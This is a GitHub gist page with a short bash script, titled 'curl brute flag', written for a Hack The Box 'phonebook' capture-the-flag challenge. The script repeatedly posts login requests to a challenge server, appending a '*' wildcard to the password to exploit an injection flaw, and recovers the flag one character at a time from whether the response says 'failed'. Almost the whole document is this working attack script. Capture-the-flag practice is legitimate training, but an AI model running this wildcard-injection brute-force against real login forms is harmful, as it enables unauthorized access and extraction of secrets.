Last active
November 18, 2022 14:41
-
-
Save laztname/0e1a5696cbeb41e9ba437c7a3d1a3fba to your computer and use it in GitHub Desktop.
curl brute flag
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# used to phonebook challenges | |
# flag are lowercase with number and underscore | |
# initial flag | |
flag="HTB{" | |
# loop till die | |
while true; do | |
# loop on possible chars | |
for i in {{a..z},_,{0..9},\},}; | |
do | |
# try, post data must ended with * due to vuln / leak | |
x=$(curl -s -D - -o /dev/null http://209.97.179.123:31420/login --data "username=reese&password=$flag$i*") | |
# check if char is contain on flag | |
if [[ "$x" != *"failed"* ]]; then | |
# append flag with new char | |
flag=$flag$i | |
printf $flag\\r | |
# exit after found | |
break | |
fi | |
# print current flag | |
printf $flag$i\\r | |
done | |
done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment